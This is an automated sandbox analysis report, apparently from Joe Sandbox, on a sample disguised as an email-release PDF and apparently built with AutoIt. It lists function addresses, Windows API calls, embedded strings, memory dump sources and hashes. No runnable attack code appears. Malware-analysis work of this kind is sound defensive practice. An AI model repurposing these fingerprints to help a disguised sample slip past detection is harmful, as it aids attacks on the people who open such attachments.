                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 3521893082-0
                                                                                                          • Opcode ID: a55b2c7becf048431dfcd10b2ec0a9c5b6ed9aba67fdc6cc0920a60a8365d089
                                                                                                          • Instruction ID: b2816f7ce44cb4df0f01c443481aedab8c751218aeecd1be02395aa0f402d4f5
                                                                                                          • Opcode Fuzzy Hash: a55b2c7becf048431dfcd10b2ec0a9c5b6ed9aba67fdc6cc0920a60a8365d089
                                                                                                          • Instruction Fuzzy Hash: DE918B72409305FFCB109F64DC08A5B7BB9FF88321F148A2AF963962A0D779D944CB56
                                                                                                          Function 00752C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?,?), ref: 00752CA2
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00752CE8
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00752CF3
                                                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00752CFE
                                                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00752D09
                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0078C43B
                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0078C474
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0078C89D
                                                                                                            • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                                                                                                          • SendMessageW.USER32(?,00001053), ref: 0078C8DA
                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0078C8F1
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0078C907
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0078C912
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 464785882-4108050209
                                                                                                          • Opcode ID: 6b9b7a65bcb0efc23019f957f6fdf27ae5a79c1f68b3b493fccdf4093f2a5c91
                                                                                                          • Instruction ID: bb68083ba1cbabdba65b8c0db996de5281126977edc176242baa12903333f60e
                                                                                                          • Opcode Fuzzy Hash: 6b9b7a65bcb0efc23019f957f6fdf27ae5a79c1f68b3b493fccdf4093f2a5c91
                                                                                                          • Instruction Fuzzy Hash: 3C129F30640201EFDB12DF24C888BA9B7E1FF05311F548569F996CB662CB79EC56CBA1
                                                                                                          Function 007C74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000), ref: 007C74DE
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007C759D
                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007C75DB
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007C75ED
                                                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007C7633
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 007C763F
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007C7683
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007C7692
                                                                                                          • GetStockObject.GDI32(00000011), ref: 007C76A2
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007C76A6
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007C76B6
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C76BF
                                                                                                          • DeleteDC.GDI32(00000000), ref: 007C76C8
                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007C76F4
                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 007C770B
                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007C7746
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007C775A
                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 007C776B
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007C779B
                                                                                                          • GetStockObject.GDI32(00000011), ref: 007C77A6
                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007C77B1
                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007C77BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                          • API String ID: 2910397461-517079104
                                                                                                          • Opcode ID: e72ade4babcdd676882f244a7981bae360433b4d0cff78c13cd6f13d8081e017
                                                                                                          • Instruction ID: c3d25d950e1b6f6d0c8ff0f91dc707dd6e5415079cd60b98a6d806f3ade7094b
                                                                                                          • Opcode Fuzzy Hash: e72ade4babcdd676882f244a7981bae360433b4d0cff78c13cd6f13d8081e017
                                                                                                          • Instruction Fuzzy Hash: A3A163B1A00619FFEB14DB64DC49FAE7779EF44710F148115FA15A72E0D6B4AD00CB64
                                                                                                          Function 007BAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007BAD1E
                                                                                                          • GetDriveTypeW.KERNEL32(?,007DFAC0,?,\\.\,007DF910), ref: 007BADFB
                                                                                                          • SetErrorMode.KERNEL32(00000000,007DFAC0,?,\\.\,007DF910), ref: 007BAF59
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                          • Opcode ID: 25f20597a125e3c419d9f76f7d09a5264d0466770c8c5d81aa6b41a36be4a804
                                                                                                          • Instruction ID: d5d40e2b3600bb18e278bebeea2bcbee847b410b1b84534d0ef98f1b72860510
                                                                                                          • Opcode Fuzzy Hash: 25f20597a125e3c419d9f76f7d09a5264d0466770c8c5d81aa6b41a36be4a804
                                                                                                          • Instruction Fuzzy Hash: FD5179B0648209FECB40FB10CD96EF973A0FB08711B208066F856E62D1DA7DD989DB53
                                                                                                          Function 007568DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                          • API String ID: 1038674560-86951937
                                                                                                          • Opcode ID: 2f6705e867a19290b02bbdbe576164aa0e3878ec95931081487a771a11c1ea4b
                                                                                                          • Instruction ID: 1535a1ca9b2f2ab1be90fb4f270ae91abef920416c3eace6fe31dbc99e3b5c68
                                                                                                          • Opcode Fuzzy Hash: 2f6705e867a19290b02bbdbe576164aa0e3878ec95931081487a771a11c1ea4b
                                                                                                          • Instruction Fuzzy Hash: 3D812BB0640305EACF24BA60DC46FEE3768AF15751F448029FD096B196EBACDD49D391
                                                                                                          Function 007D9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007D9AD2
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007D9B8B
                                                                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 007D9BA7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2326795674-4108050209
                                                                                                          • Opcode ID: 1698f26522ff0e8412884c8c665a484ce1d5641b10d188529251004dfe712477
                                                                                                          • Instruction ID: 3794c0c79555db18ef58f21a276d81240dc535a01b9595f3dc88e4016a3e4b6d
                                                                                                          • Opcode Fuzzy Hash: 1698f26522ff0e8412884c8c665a484ce1d5641b10d188529251004dfe712477
                                                                                                          • Instruction Fuzzy Hash: B302CE31205201AFD725CF24C849BAABBF5FF89314F04892EFA99D63A1D778D944CB52
                                                                                                          Function 007DA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000012), ref: 007DA903
                                                                                                          • SetTextColor.GDI32(?,?), ref: 007DA907
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007DA91D
                                                                                                          • GetSysColor.USER32(0000000F), ref: 007DA928
                                                                                                          • CreateSolidBrush.GDI32(?), ref: 007DA92D
                                                                                                          • GetSysColor.USER32(00000011), ref: 007DA945
                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DA953
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 007DA964
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 007DA96D
                                                                                                          • SelectObject.GDI32(?,?), ref: 007DA97A
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007DA999
                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DA9B0
                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 007DA9C5
                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DA9ED
                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007DAA14
                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 007DAA32
                                                                                                          • DrawFocusRect.USER32(?,?), ref: 007DAA3D
                                                                                                          • GetSysColor.USER32(00000011), ref: 007DAA4B
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 007DAA53
                                                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007DAA67
                                                                                                          • SelectObject.GDI32(?,007DA5FA), ref: 007DAA7E
                                                                                                          • DeleteObject.GDI32(?), ref: 007DAA89
                                                                                                          • SelectObject.GDI32(?,?), ref: 007DAA8F
                                                                                                          • DeleteObject.GDI32(?), ref: 007DAA94
                                                                                                          • SetTextColor.GDI32(?,?), ref: 007DAA9A
                                                                                                          • SetBkColor.GDI32(?,?), ref: 007DAAA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 1996641542-0
                                                                                                          • Opcode ID: 378f32a4c92103bbd93a3b86b08f3c5a6c6126137a3772f7e66fb181e54c8794
                                                                                                          • Instruction ID: 4533a6775c2d8005f883e16bdaba94edb491f6efe80d134ae10de8ecbeddf0dc
                                                                                                          • Opcode Fuzzy Hash: 378f32a4c92103bbd93a3b86b08f3c5a6c6126137a3772f7e66fb181e54c8794
                                                                                                          • Instruction Fuzzy Hash: 45514F71901208FFDF109FA4DC48E9E7BB9FB08320F158226F912AB2A1D7799940DB54
                                                                                                          Function 007D89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007D8AC1
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8AD2
                                                                                                          • CharNextW.USER32(0000014E), ref: 007D8B01
                                                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007D8B42
                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007D8B58
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8B69
                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007D8B86
                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 007D8BD8
                                                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007D8BEE
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D8C1F
                                                                                                          • _memset.LIBCMT ref: 007D8C44
                                                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007D8C8D
                                                                                                          • _memset.LIBCMT ref: 007D8CEC
                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007D8D16
                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 007D8D6E
                                                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 007D8E1B
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 007D8E3D
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D8E87
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D8EB4
                                                                                                          • DrawMenuBar.USER32(?), ref: 007D8EC3
                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 007D8EEB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1073566785-4108050209
                                                                                                          • Opcode ID: e48d405f16d3010a2818bb40f1b4cb0523ee4b45c96b6d97821fb1c3771c6a07
                                                                                                          • Instruction ID: 3a904b0c07838fc184c70360c3b243ccd72b0c418def337df029bee432a6cc2d
                                                                                                          • Opcode Fuzzy Hash: e48d405f16d3010a2818bb40f1b4cb0523ee4b45c96b6d97821fb1c3771c6a07
                                                                                                          • Instruction Fuzzy Hash: 7EE17F70901208EFDF609F64CC88EEE7B79EF49710F148157F929AA290DB789981DF61
                                                                                                          Function 007D488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 007D49CA
                                                                                                          • GetDesktopWindow.USER32 ref: 007D49DF
                                                                                                          • GetWindowRect.USER32(00000000), ref: 007D49E6
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007D4A48
                                                                                                          • DestroyWindow.USER32(?), ref: 007D4A74
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007D4A9D
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007D4ABB
                                                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007D4AE1
                                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 007D4AF6
                                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007D4B09
                                                                                                          • IsWindowVisible.USER32(?), ref: 007D4B29
                                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007D4B44
                                                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007D4B58
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007D4B70
                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 007D4B96
                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 007D4BB0
                                                                                                          • CopyRect.USER32(?,?), ref: 007D4BC7
                                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 007D4C32
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                          • API String ID: 698492251-4156429822
                                                                                                          • Opcode ID: 33bcbff9510c5bba5fb7c7dca5ffe02ae3408d99ff2c0cecd85e0b366526f645
                                                                                                          • Instruction ID: e976aed086dcb47d5d782ca6509063775faa8b2b41fcba3ee8cc666373d5fc6b
                                                                                                          • Opcode Fuzzy Hash: 33bcbff9510c5bba5fb7c7dca5ffe02ae3408d99ff2c0cecd85e0b366526f645
                                                                                                          • Instruction Fuzzy Hash: 2AB15871604340EFDB04DF65C849B6ABBF5BF88310F00891EF99A9B2A1D779E805CB95
                                                                                                          Function 007B449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007B44AC
                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007B44D2
                                                                                                          • _wcscpy.LIBCMT ref: 007B4500
                                                                                                          • _wcscmp.LIBCMT ref: 007B450B
                                                                                                          • _wcscat.LIBCMT ref: 007B4521
                                                                                                          • _wcsstr.LIBCMT ref: 007B452C
                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007B4548
                                                                                                          • _wcscat.LIBCMT ref: 007B4591
                                                                                                          • _wcscat.LIBCMT ref: 007B4598
                                                                                                          • _wcsncpy.LIBCMT ref: 007B45C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                          • API String ID: 699586101-1459072770
                                                                                                          • Opcode ID: f586b6cbb9551b3b51a7568551f6d6bf06f8ac8eae0e5d18b671532e7a929d9d
                                                                                                          • Instruction ID: a934175d6dc6767edee8c04ea08d07b89851cde8e45b5375cbe7d0d11b5d0c96
                                                                                                          • Opcode Fuzzy Hash: f586b6cbb9551b3b51a7568551f6d6bf06f8ac8eae0e5d18b671532e7a929d9d
                                                                                                          • Instruction Fuzzy Hash: 8E41D871600204FADB10AA748C0BFFF777CDF42750F04806AF959E6283EA7D9A1196A9
                                                                                                          Function 007527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528BC
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 007528C4
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528EF
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 007528F7
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 0075291C
                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00752939
                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00752949
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0075297C
                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00752990
                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 007529AE
                                                                                                          • GetStockObject.GDI32(00000011), ref: 007529CA
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 007529D5
                                                                                                            • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                                                                                                            • Part of subcall function 00752344: ScreenToClient.USER32(008157B0,?), ref: 00752374
                                                                                                            • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                            • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00751256), ref: 007529FC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
